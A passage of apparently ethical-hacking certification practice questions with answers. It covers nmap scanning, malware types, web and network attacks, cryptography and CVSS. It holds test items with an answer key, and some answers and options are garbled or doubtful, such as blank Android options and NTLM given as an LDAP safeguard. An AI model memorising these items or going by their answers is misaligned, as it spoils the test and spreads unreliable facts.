session hijacking. Which of the following protocols, which can send data using encryption and digital certificates, will help solve this problem? A) IP B) FTP C) HTTPS D) FTPS FTPS Marketing department employees complain that their computers are working slow and every time they attempt to go to a website, they receive a series of pop-ups with advertisements. Which of the following type of malwares infected their systems? A) Virus B) Spyware C) Adware D) Trojan Adware Ivan, the evil hacker, decided to use Nmap scan open ports and running services on systems connected to the target organization's OT network. For his purposes, he enters the Nmap command into the terminal which identifies Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following commands did Ivan use in this scenario? A) nmap -Pn -sT -p 46824 <target IP> B) nmap -Pn -sU -p 44818 --script enip-info <target IP> C) nmap -Pn -sT --scan-dela 1s --max-parallelism 1 -p <port list> <target IP> D) nmap -Pn -sT -p 102 --script s7-info <target IP> nmap -Pn -sU -p 44818 --script enip-info <target IP> Which of the following types of attack (that can use either HTTP GET or HTTP POST) allows an attacker to induce users to perform actions that they do not intend to perform? A) Cross-Site Scripting B) SQL Injection C) Cross-Site Request Forgery D) Browser Hacking Cross-Site Request Forgery John sent a TCP ACK segment to a known closed port on a firewall, but it didn't respond with an RST. What conclusion can John draw about the firewall he scanned? A) It's a non-stateful firewall B) John can't draw any conclusions based on this information C) It's a stateful firewall D) There is no firewall It's a stateful firewall The medical company has recently experienced security breaches. After this incident, their patients' personal medical records became available online and easily found using Google. Which of the following standards has the medical organization violated? A) PCI DSS B) PII C) HIPAA/PHI D) ISO 2002 HIPAA/PHI Identify the attack by description: When performing this attack, an attacker installs a fake communication tower between two authentic endpoints to mislead a victim. He uses this virtual tower to interrupt the data transmission between the user and the real tower, attempting to hijack an active session. After that, the attacker receives the user's request and can manipulate the virtual tower traffic and redirect a victim to a malicious website. A) Wardriving B) Jamming signal attack C) aLTEr attack D) KRACK attack aLTEr attack Which of the following encryption algorithms is a symmetric key block cipher that has a 128-bit block size, and its key size can be up to 256 bits? A) IDEA B) Blowfish C) HMAC D) Twofish Twofish A competitor organization has hired a professional hacker who could collect sensitive information about your organization. The hacker starts by gathering the server IP address of the target organization using Whois footprinting. After this, he entered the server IP address as an input to an online tool to retrieve information such as your organization's network range and identify the network topology and operating system used in the network. Which of the following tools did the hacker use for this purpose? A) Baidu B) AOL C) DuckDuckGo D) ARIN ARIN You need to identify the OS of the target host. You want to use the Unicornscan tool to do this. As a result of using the tool, you got the TTL value and determined that the target system is running a Windows OS. Which of the following TTL values did you get when using the program? A) 255 B) 138 C) 128 D) 64 128 Which of the following Nmap commands perform a stealth scan? A) nmap -sU B) nmap -sS C) nmap -sM D) nmap -sT nmap -sS Identify the attack by description: The attacker decides to attack IoT devices. First, he will record the frequency required to share information between connected devices. Once he gets the necessary frequency, the attacker will capture the original data when the connected devices initiate commands. As soon as he collects original data, he will use tools such as URH to segregate the command sequence. The final step in this attack will be starting injecting the segregated command sequence on the same frequency into the IoT network, which repeats the captured signals of the devices. A) Side-channel attack B) Reconnaissance attack C) Cryptanalysis attack D) Replay attack Replay attack You are the head of the Network Administrators department. And one of your subordinates uses SNMP to manage networked devices from a remote location. And one of your subordinates uses SNMP to manage networked devices from a remote location. To manage network nodes, your subordinate uses MIB, which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and L or by entering the DNS library name and L. You know that your subordinate can retrieve information from a MIB that contains object types for workstations and server services. Which of the following types of MIB will your subordinate use to retrieve information about types for workstations and server services? A) DHCP.MIB B) WINS.MIB C) MIB_II.MIB D) LNMIB2.MIB LNMIB2.MIB Justin, the evil hacker, wants to steal Joanna's data. He sends Joanna an email with a malicious link that looks legitimate. Joanna unknowingly clicks on the link, and it redirects her to a malicious web page, and John steals Joanna's data. Which of the following attacks is described in this scenario? A) Phishing B) DDoS C) Vishing D) Spoofing Phishing The attacker plans to compromise the systems of organizations by sending malicious emails. He decides to use the tool to track the target's emails and collect information such as senders' identities, mail servers, sender IP addresses, and sender locations from different public sources. It also checks email addresses for leaks using API. Which of the following tools is used by the attacker? A) ZoomInfo B) Factiva C) Netcraft D) Infoga Infoga You need to describe the principal characteristics of the vulnerability and make a numerical estimate reflecting its severity using CVSS v3.0 to properly assess and prioritize the organization's vulnerability management processes. As a result of the research, you received a basic score of 4.0 according to CVSS rating. What is the CVSS severity level of the vulnerability discovered? A) Medium B) Critical C) Low D) High Medium Johnny decided to gather information for identity theft from the target organization. He wants to redirect the organization's web traffic to a malicious website. After some thought, he plans to perform DNS cache poisoning by exploiting the vulnerabilities in the DNS server software and wants to modify the original IP address of the target website to that of a malicious website. Which of the following techniques does Johnny plan to use? A) Pretexting B) Pharming C) Skimming D) Wardriving Pharming You have detected an abnormally large amount of traffic coming from local computers at night. You decide to find out the reason, do a few checks and find that an attacker has exfiltrated user data. Also, you noticed that AV tools could not find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. Which of the following type of malware did the attacker use to bypass your company's application whitelisting? A) Fileless malware B) Phishing malware C) Logic bomb malware D) Zero-day malware Fileless malware Imagine the following scenario: The hacker monitored and intercepted already established traffic between the victim and a host machine to predict the victim's ISN. The hacker sent spoofed packets with the victim's IP address to the host machine using the ISN. After this manipulation, the host machine responded with a packet having an incremented ISN. After this manipulation, the host machine responded with a packet having an incremented ISN. The victim's connection was interrupted, and the hacker was able to connect with the host machine on behalf of the victim. Which of the following attacks did the hacker perform? A) TCP/IP hijacking B) UDP hijacking C) Forbidden attack D) Blind hijacking TCP/IP hijacking Which of the following attacks can you perform if you know that the web server handles the "(../)" (character string) incorrectly and returns the file listing of a folder structure of the server? A) Denial of service B) SQL injection C) Cross-site scripting D) Directory traversal Directory traversal Identify the phase of the APT lifecycle that the hacker is in at the moment according to the scenario given below: The hacker prepared for an attack and attempted to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Thanks to the successful attack, he deployed malware on the target system to establish an outbound connection and began to move on. A) Preparation B) Initial intrusion C) Persistence D) Cleanup Initial intrusion The attacker is performing the footprinting process. He checks publicly available information about the target organization by using the Google search engine. Which of the following advanced operators will he use to restrict the search to the organization's web domain? A) [link:] B) [site:] C) [location:] D) [allinurl:] [site:] You enter the following command to get the necessary data: ping-* 6 192.168.120.114 Output: Pinging 192.168.120.114 with 32 bytes of data: Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 Ping statistics for 192.168.120.114 Packets: Sent = 6, Received = 6, Lost = 0 (0% loss). Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms Which of the following flags is hidden under "*"? A) a B) n C) s D) t n Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker? A) In-band SQLi B) Time-based blind SQLi C) Out-of-band SQLi D) Union-based SQLi Out-of-band SQLi According to Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, which of the following ranges is the medium? A) 3.9-6.9 B) 4.0-6.0 C) 3.0-6.9 D) 4.0-6.9 4.0-6.9 Which of the following is an IOS jailbreaking technique that patches the kernel during the device boot to keep jailbroken after each reboot? A) Untethered jailbreaking B) Semi-untethered jailbreaking C) Tethered jailbreaking D) Semi-tethered jailbreaking Untethered jailbreaking You were instructed to check the configuration of the webserver and you found that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. You understand that this vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information. Which of the following attacks can an attacker perform using this vulnerability? A) Padding oracle attack B) DUHK attack C) DROWN attack D) Side-channel attack DROWN attack Which of the following is API designed to reduce complexity and increase the integrity of updating and changing which uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application? A) REST API B) JSON-RPC C) SOAP API D) RESTful API RESTful API Your organization has a public key infrastructure set up. Your colleague Bernard wants to send a message to Joan. Therefore, Bernard both encrypts the message and digitally signs it. Bernard uses ____ to encrypt the message for these purposes, and Joan uses ____ to confirm the digital signature. A) Joan's public key; Bernard's public key B) Joan's private key; Bernard's public key C) Bernard's public key; Bernard's public key D) Joan's public key; Joan's public key Joan's public key; Bernard's public key Which of the following files determines the basic configuration in an Android application, such as broadcast receivers, services, etc.? A) B) C) AndroidM D) APK.info AndriodM You must bypass the firewall. To do this, you plan to use DNS to perform data exfiltration on an attacked network. You embed malicious data into the DNS protocol packets. DNSSEC can't detect these malicious data, and you successfully inject malware to bypass a firewall and maintain communication with the victim machine and C&C server. Which of the following techniques would you use in this scenario? A) DNS cache snooping B) DNS tunneling C) DNS enumeration D) DNSSEC zone walking DNS tunneling You want to make your life easier and automate the process of updating applications. You decide to use a user-defined HTTP callback or push APIs that are raised based on trigger events. When this feature invokes, data is supplied to other applications so that users can instantly receive real-time information. What is the name of this technique? A) Web shells B) REST API C) SOAP API D) Webhooks Webhooks Identify the protocol used to secure an LDAP service against anonymous queries? A) SSO B) RADIUS C) NTLM D) WPA NTLM Ron, the hacker, is trying to crack an employee's password of the target organization utilizing a rainbow table. During the break-in, he discovered that upon entering a password that extra characters are added to the password after submitting. Which of the following countermeasures is the target company using to protect against rainbow tables? A) Password key hashing B) Account lockout C) Password hashing D) Password salting Password salting Your company has hired Jack, a cybersecurity specialist, to conduct another pentest. Jack immediately decided to get to work. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. As a result of these actions, a DDoS attack occurred, and legitimate employees could not access the company's network. Which of the following attacks did Jack perform? A) VLAN hopping B) DHCP starvation C) Rouge DHCP server attack D) STP attack DHCP starvation Which of the following tiers in the three-tier application architecture is responsible for moving and processing data between them? A) Data tier B) Application tier C) Logic tier D) Presentation tier Logic tier As usual, you want to open your online banking from your home computer. You enter the URL into your browser. The website is displayed and prompts you to re-enter your credentials as if you have never visited the site before. You decide to check the URL of the website and notice that the site is not secure and the web address appears different. Which of the following types of attacks have you been exposed to? A) ARP cache poisoning B) DHCP spoofing C) DoS attack D) DNS hijackig DNS hijacking You want to execute an SQLi attack. The first thing you check is testing the response time of a true or false response. Secondly, you want to use another command to determine whether the database will return true or false results for user IDs. Which two SQL injection types have you tried to perform? A) Out of band and boolean-based B) Union-based and error-based C) Time-based and union-based D) Time-based and boolean-based Time-based and boolean-based Recently your company set up a cloud computing service. Your system administrator reached out to a telecom company to provide Internet connectivity and transport services between the organization and the cloud service provider to implement this service. Which category does the telecom company fall in the above scenario according to NIST cloud deployment reference architecture? A) Cloud auditor B) Cloud carrier C) Cloud broker D) Cloud consumer Cloud carrier Which of the following type of viruses avoid detection changing their own code, and then cipher itself multiple times as it replicates? A) Tunneling virus B) Encryption virus C) Cavity virus D) Stealth virus Stealth virus Your organization's network uses the network address 192.168.1.64 with mask 255.255.255.192, and servers in your organization's network are in the addresses 192.168.1.140, 192.168.1.141 and 192.168.1.142. The attacker who wanted to find them couldn't do it. He used the following command for the network scanning: nmap 192.168.1.64/28 Why couldn't the attacker find these servers? A) He needs to add the command "ip address" just before the IP address B) He is scanning from 192.168.1.64-192.168.1.78 because of the mask /28 and the servers are not in that range C) The network must be drawn and the nmap command and IP address are ok D) He needs to change the address to 192.168.1.0 with the same mask He is scanning from 192.168.1.64-192.168.1.78 becasue of the mask /28 and the servers are not in that range Identify the technique by description: The attacker wants to create a botnet. Firstly, he collects information about a large number of vulnerable machines to create a list. Secondly, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures a very fast spreading and installation of malicious code. A) Permutation scanning technique B) Topologial scanning technique C) Subnet scanning technique D) Hit-list scannig technique Hit-list scanning technique Which of the following AAA protocols can use for authentication users connecting via analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network? A) RADIUS B) Kerberos C) TACACS D) DIAMETER RADIUS According to the configuration of the DHCP server, only the last 100 IP addresses are available for lease in subnet 10.1.4.0/23. Which of the following IP addresses is in the range of the last 100 addresses? A) 10.1.4.254 B) 10.1.5.200 C) 10.1.3.156 D) 10.1.155.200 10.1.5.200 The attacker wants to attack the target organization's Internet-facing web server. In case of a successful attack, he will also get access to back-end servers protected by a firewall. The attacker plans to use URL Which of the following types of attacks is the attacker planning to perform? A) Web server misconfiguration B) Server-side request forgery attack C) Website defacement D) Web cache poisoning atta